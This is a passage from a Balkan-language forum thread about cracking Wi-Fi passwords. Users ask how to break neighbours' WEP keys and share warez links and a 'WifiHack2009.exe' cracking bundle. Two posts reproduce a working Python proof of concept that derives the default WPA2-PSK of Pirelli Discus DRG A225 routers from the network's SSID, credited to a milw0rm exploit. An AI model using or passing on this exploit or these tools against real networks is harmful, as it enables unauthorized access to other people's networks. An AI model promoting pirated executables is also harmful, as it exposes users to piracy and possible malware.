Page 2 of 2 FirstFirst 12
Results 26 to 41 of 41

Thread: wireless key :D

  1. #26
    Join Date
    Feb 2006
    Posts
    1,654
    Thanks Thanks Given 
    445
    Thanks Thanks Received 
    67
    Thanked in
    45 Posts

    Default

    To uopšte nije program kojim ćeš probit wep enkripciju, ako si to htio da provališ.
    Bolje se ostavi toga, mnogo si loš.

  2. #27
    Join Date
    Sep 2008
    Location
    Ilirija
    Posts
    288
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    :lolblue::lolblue: a ja budala to sto znam bi da podijelim ali ovi nasi hakeri nas novajlije samo zajebavaju, nece niko da pisne... ne vidim zasto je toliki problem da se pomogne malo tj dati neko ime, link itd...

  3. #28
    Join Date
    Feb 2006
    Posts
    1,654
    Thanks Thanks Given 
    445
    Thanks Thanks Received 
    67
    Thanked in
    45 Posts

  4. #29
    Join Date
    Sep 2008
    Location
    Ilirija
    Posts
    288
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    hvala brat'

  5. #30
    Join Date
    Jan 2009
    Location
    Sutomore,Crna Gora
    Posts
    395
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    Ja da znam i ja bih ti reko,...ali nisam dolazio u susret sa ovakvim programima...nisam ni cuo sa njih....znam da je tesko provaliti WEP passs...tj bilo je nemoguce dok i tome nisu dosli glave....uzgred ima likova koji znaju ove programe...tako da i ja zahvaljujem na linku....
    Gonna be DOCTOR.....In a couple of YEARS

  6. #31
    Join Date
    Jan 2004
    Location
    Podgorica
    Posts
    2,671
    Thanks Thanks Given 
    2
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    ko to jos ovih dana koristi WEP? kad skoro svi routeri podrzavaju WPA2 koji je daleko sigurniji.

  7. #32
    Join Date
    Jan 2009
    Posts
    1,861
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Default

    Quote Originally Posted by shoku View Post
    wireless key generator se zove program
    evo i link http://www.warez-bb.org/viewtopic.ph...128&highlight=
    download link http://rapidshare.de/files/21984034/...y_gen_v1.0.rar
    Password: http://treasuredwarez.com



    nisam ja vrsta ovija posrova ovdje sto vise po 10 godina pa ih je muka pomagat onda preokrenu temu u nesto drugo ...
    off topic
    key generator se zove program ?
    pa valjda samo pravi key za wireless kad ti treba da stavis po prvi put,a ne da probije koji je key ?

  8. #33
    Join Date
    Feb 2006
    Posts
    1,654
    Thanks Thanks Given 
    445
    Thanks Thanks Received 
    67
    Thanked in
    45 Posts

    Default

    Quote Originally Posted by metalac View Post
    ko to jos ovih dana koristi WEP? kad skoro svi routeri podrzavaju WPA2 koji je daleko sigurniji.
    8/10 mreža oko mene je sa WEP enkripcijom.
    Last edited by Winamp; 08-04-09 at 20:55.

  9. #34
    Join Date
    Apr 2004
    Posts
    1,534
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    6
    Thanked in
    5 Posts

    Default

    #!/usr/bin/python
    #
    # Pirelli Discus DRG A225 WiFi router
    # Default WPA2-PSK algorithm vulnerability
    #
    #
    # With this code we can predict the WPA2-PSK key...
    #

    # Use for education or legal penetration testing purposes.....
    #
    import sys

    def hex2dec(s):
    return int(s, 16)

    if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
    print "\r\nEnter the last 6 chars from Discus SSID"
    print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
    exit()
    const = hex2dec('D0EC31')
    inp = hex2dec(sys.argv[1])
    result = (inp - const)/4

    print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)

  10. #35
    Join Date
    Feb 2004
    Location
    19° 6' - 46° 6'
    Posts
    33
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts

    Exclamation

    Omega, sljedeci put kada radis copy/paste nemoj da ti se omakne koja linija komentara. Svi sajtovi su PoC prenijeli onako kako je napisan, ne znam zasto ti smeta ostatak?

    http://www.milw0rm.com/exploits/8359 - exploit
    http://www.milw0rm.com/papers/313 - paper

    /j0rgan
    Only two things are infinite, the universe and human stupidity, but i'm not sure about the former.

  11. #36
    Sparco_CG's Avatar
    Sparco_CG is offline Najpovoljniji diler racunara i opreme u Podgorici
    Join Date
    Mar 2007
    Location
    Podgorica, Montenegro
    Posts
    8,545
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    58
    Thanked in
    36 Posts

    Default

    Quote Originally Posted by Winamp View Post
    8/10 mreža oko mene je sa WEP enkripcijom.
    brate skidoh onaj program sto si dao link, i vidim da se preko dosa radi, pa mozes li mi objasniti sta da radim posle onih komandi :

    X:
    CD \BOOT\DOS
    BT4.bat


    hvala unaprijed
    BMW Arsovic
    068-615-321 (viber)
    [email][email protected]


  12. #37
    Join Date
    Apr 2004
    Posts
    1,534
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    6
    Thanked in
    5 Posts

    Default

    Quote Originally Posted by jorgan View Post
    Omega, sljedeci put kada radis copy/paste nemoj da ti se omakne koja linija komentara. Svi sajtovi su PoC prenijeli onako kako je napisan, ne znam zasto ti smeta ostatak?

    http://www.milw0rm.com/exploits/8359 - exploit
    http://www.milw0rm.com/papers/313 - paper

    /j0rgan
    Nije mi smetao komentar nego sam tu bio zapisao ove sestocifrene oznake mreza u mom okruzenju (posto nemam Linux instaliran pa sam ovu skriptu odradio u Excelu), pa kada sam uradio copy paste sa mog compa izbrisah citavu liniju eto.

    Ne zanosim se mislju da sam haker ili nesto slicno
    evo original sa jedno svaka cast i hvala za gdina Muris Kurgas

    #!/usr/bin/python
    #
    # Pirelli Discus DRG A225 WiFi router
    # Default WPA2-PSK algorithm vulnerability
    #
    # paper: http://milw0rm.com/papers/313
    #
    # With this code we can predict the WPA2-PSK key...
    #
    # Hacked up by Muris Kurgas aka j0rgan
    # j0rgan (-@-) remote-exploit.org
    # http://www.remote-exploit.org
    #
    # Use for education or legal penetration testing purposes.....
    #
    import sys

    def hex2dec(s):
    return int(s, 16)

    if len(sys.argv) < 2 or len(sys.argv[1]) != 6:
    print "\r\nEnter the last 6 chars from Discus SSID"
    print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n"
    exit()
    const = hex2dec('D0EC31')
    inp = hex2dec(sys.argv[1])
    result = (inp - const)/4

    print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result)

    # milw0rm.com [2009-04-06]
    Last edited by Omega; 10-04-09 at 13:59.

  13. #38
    Sparco_CG's Avatar
    Sparco_CG is offline Najpovoljniji diler racunara i opreme u Podgorici
    Join Date
    Mar 2007
    Location
    Podgorica, Montenegro
    Posts
    8,545
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    58
    Thanked in
    36 Posts

    Default

    oce li mi iko objasniti kako ovaj program radi i kako da ga koristim?!!!

    HVALA
    BMW Arsovic
    068-615-321 (viber)
    [email][email protected]


  14. #39
    Join Date
    Feb 2006
    Posts
    1,654
    Thanks Thanks Given 
    445
    Thanks Thanks Received 
    67
    Thanked in
    45 Posts

    Default

    Quote Originally Posted by Sparco_CG View Post
    brate skidoh onaj program sto si dao link, i vidim da se preko dosa radi, pa mozes li mi objasniti sta da radim posle onih komandi :

    X:
    CD \BOOT\DOS
    BT4.bat


    hvala unaprijed
    Ono ti je linux distribucija, koju dižeš sa flash-a ili dvd-a, dakle van windowsa. A posle što ćeš radit šnjom, to viđi neki tutorial da nađeš za kakvu ti mrežu treba. Imaš ih po youtube-u il tako neđe. Viđi što će ti google reć.

    PS. Nisam znao da neko iz cg radi na backtrack projektu. j0rgan - respect drugaaaaaru.

  15. #40
    Join Date
    Jan 2004
    Posts
    36,994
    Thanks Thanks Given 
    90
    Thanks Thanks Received 
    3,339
    Thanked in
    1,866 Posts

    Default

    Backtrack radi, samo je mali problemčić ukoliko neki ima wireless a ne koristi ga. Na primjer u mom komšiluku imam dva wireless -a ali nijedan nije "aktivan" nego su ljudi vjerovatno zakačeni preko LAN -a. Tako da im je provaljivanje Sizifov posao...
    -> Forma za naručivanje online stvari <-

    Bugi Vugi tapši Raduj se!

  16. #41
    Join Date
    Oct 2004
    Location
    CUCE
    Posts
    1,343
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    1
    Thanked in
    1 Post

    Default

    skup alata za hakovanje tj. crackovanje WiFi konekcija
    http://d01.megashares.com/dl/d0ef81f/WifiHack2009.exe
    125Mb velicina programa... kome treba neka skida...

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Wireless . . .
    By cpu in forum Software
    Replies: 52
    Last Post: 28-03-08, 19:37
  2. Lap top i wireless
    By cpu in forum Hardware
    Replies: 10
    Last Post: 25-12-07, 23:54
  3. Wireless
    By N_L in forum Internet
    Replies: 9
    Last Post: 29-03-06, 21:53
  4. wireless u CG
    By woofer in forum Software
    Replies: 4
    Last Post: 23-01-06, 15:44
  5. Wireless lag
    By BlackHawk in forum Internet
    Replies: 11
    Last Post: 06-01-06, 15:56

Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •